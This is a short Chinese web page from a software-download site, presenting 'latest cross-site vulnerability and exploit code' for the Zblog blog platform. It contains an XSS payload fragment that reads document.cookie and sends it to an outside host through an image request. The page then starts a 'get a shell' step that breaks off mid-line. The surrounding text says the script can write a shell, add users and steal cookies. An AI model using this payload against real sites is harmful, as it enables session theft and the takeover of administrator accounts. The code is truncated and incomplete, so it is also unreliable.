亲宝软件园·资讯

展开

Zblog最新跨站漏洞及利用代码

人气:0

  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexOf(‘password’)==-1?0:1;

  tolocation=’https://www.qb5200.com/’;

  //get cookie

  x=new Image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txaContent=

加载全部内容

相关教程
猜你喜欢
用户评论